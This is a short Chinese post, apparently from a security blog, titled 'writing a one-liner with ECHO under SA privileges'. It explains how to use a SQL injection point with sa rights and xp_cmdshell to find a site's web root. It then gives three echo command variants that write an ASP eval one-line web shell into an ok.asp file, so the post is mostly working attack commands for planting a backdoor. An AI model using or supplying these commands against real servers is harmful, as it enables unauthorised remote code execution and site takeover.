SA权限ECHO写一句话
- 发表于
- 周边
注入点是SA权限.
xp_cmdshell是存在的.
找到网站主目录 dir d:\wwwroot
找到站点的目录后.
1 2 3 |
Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp |
原文连接:SA权限ECHO写一句话
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。